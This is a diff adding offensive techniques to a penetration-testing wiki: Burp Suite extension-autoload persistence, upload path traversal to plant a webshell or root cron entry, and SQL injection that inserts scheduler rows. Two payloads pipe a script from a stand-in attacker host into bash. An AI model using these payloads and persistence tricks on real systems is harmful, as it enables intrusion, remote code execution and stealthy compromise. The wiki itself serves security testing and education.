Metasploit Wrap-Up 01/30/2026

src/linux-hardening/linux-post-exploitation/README.md

@@ -132,12 +132,19 @@ Hardening
 - Overwrite the in-memory `argv[0]` buffer after reading `/proc/self/cmdline` length and the `argv[0]` pointer, padding with NULs so `/proc/<pid>/cmdline` and `ps` also show the fake label.
 - Hunt by comparing `Name:` in `/proc/<pid>/status` against the real executable path and looking for loopback mutex listeners owned by processes with tiny/blank cmdlines.
 
+## BurpSuite extension persistence (userland)
+
+- Burp stores extension autoload configuration in user-level settings (e.g., `~/.BurpSuite/UserConfig*.json` on Linux/macOS or `%USERPROFILE%\.BurpSuite\` on Windows). Appending a malicious JAR/Python extension path with `autoload":true` causes Burp to execute the payload whenever the user launches BurpSuite.
+- Delivery flow: drop the extension file into a writable profile directory, patch the JSON settings to add the extender entry (type, path, and enabled/autoload flags), and ensure "Automatically reload extensions on startup" is enabled in the options block.
+- Persistence trigger is user-driven (opening BurpSuite), making it stealthier than system-level autoruns while still granting execution in the context of a tester’s workstation.
+
 ## References
 
 - [0xdf – HTB Planning (Grafana env creds reuse, systemd BASIC_AUTH)](https://0xdf.gitlab.io/2025/09/13/htb-planning.html)
 - [alseambusher/crontab-ui](https://github.com/alseambusher/crontab-ui)
 - [0xdf – HTB Environment (GPG homedir relocation to decrypt loot)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
 - [GnuPG Manual – Home directory and GNUPGHOME](https://www.gnupg.org/documentation/manuals/gnupg/GPG-Configuration-Options.html#index-homedir)
 - [Inside GoBruteforcer: AI-generated server defaults, weak passwords, and crypto-focused campaigns](https://research.checkpoint.com/2026/inside-gobruteforcer-ai-generated-server-defaults-weak-passwords-and-crypto-focused-campaigns/)
+- [Metasploit Wrap-Up 01/30/2026](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-01-30-2026)
 
 {{#include ../../banners/hacktricks-training.md}}

src/pentesting-web/file-upload/README.md

@@ -549,6 +549,19 @@ Content-Type: application/json
 
 Backend copies `file.filepath`, so the response returns that path’s content. Common chain: read `/proc/self/environ` to learn `$HOME`, then `$HOME/.n8n/config` for keys and `$HOME/.n8n/database.sqlite` for user identifiers.
 
+### Path traversal on upload destination (arbitrary file write → RCE)
+
+If the upload handler uses an attacker-controlled path component (e.g., a `guid`/`path` parameter) to build the destination, path traversal converts the upload into **arbitrary file write**:
+
+- **Windows:** traverse into the webroot (e.g., `../../inetpub/wwwroot/shell.aspx`) and write a webshell that the attacker triggers over HTTP.
+- **Linux:** traverse to `/etc/cron.d/<name>` and drop a cron entry that executes commands as root when cron parses the file:
+
+```cron
+* * * * * root /bin/bash -c 'curl http://attacker/p.sh|bash'
+```
+
+- Ensure the request sets the traversal inside the server-side path segment, not just the filename field, and keep payload size small to avoid logging throttles. This turns a pre-auth upload into code execution even when the handler was intended for benign blobs only.
+
 ## References
 
 - [n8n form upload Content-Type confusion → arbitrary file read PoC](https://github.com/Chocapikk/CVE-2026-21858)
@@ -567,6 +580,7 @@ Backend copies `file.filepath`, so the response returns that path’s content. C
 - [CVE-2024-21546 – NVD entry](https://nvd.nist.gov/vuln/detail/CVE-2024-21546)
 - [PoC gist for LFM .php. bypass](https://gist.github.com/ImHades101/338a06816ef97262ba632af9c78b78ca)
 - [0xdf – HTB Environment (UniSharp LFM upload → PHP RCE)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
+- [Metasploit Wrap-Up 01/30/2026](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-01-30-2026)
 - [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
 - [Microsoft – mklink (command reference)](https://learn.microsoft.com/windows-server/administration/windows-commands/mklink)
 - [0xdf – HTB: Certificate (ZIP NUL-name and stacked ZIP parser confusion → PHP RCE)](https://0xdf.gitlab.io/2025/10/04/htb-certificate.html)

src/pentesting-web/sql-injection/README.md

@@ -659,6 +659,22 @@ Mitigations:
 https://github.com/m4ll0k/Atlas
 {{#endref}}
 
+### SQLi as a write primitive to scheduler/cron tables (RCE)
+
+If an authenticated endpoint is reachable pre-auth via an **auth bypass** and contains SQLi, treat the database as a **write primitive** instead of just data exfil:
+
+- Target scheduler tables (e.g. `cron_job`, `task_queue`, `jobs`) that the application daemon periodically executes. Insert a row that runs your command and mark it enabled/active.
+- Example payload (conceptual – adapt to the schema):
+
+```sql
+INSERT INTO cron_job (id, name, command, enabled, nextrun)
+VALUES (1337, 'healthcheck', 'bash -c "curl http://attacker/p.sh|bash"', 1, NOW());
+```
+
+- Some apps sanitize job names but not the command body; keep the command small and pull a second stage over HTTP(S).
+- After the scheduler tick runs, you gain OS command execution even when direct stacked queries/`xp_cmdshell` aren’t possible.
+- Cleanup: delete the job or set `enabled=0` once a session is established to reduce noise.
+
 ## Other Guides
 
 - [https://sqlwiki.netspi.com/](https://sqlwiki.netspi.com)
@@ -674,5 +690,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt
 ## References
 
 - [https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/)
+- [Metasploit Wrap-Up 01/30/2026](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-01-30-2026)
 
 {{#include ../../banners/hacktricks-training.md}}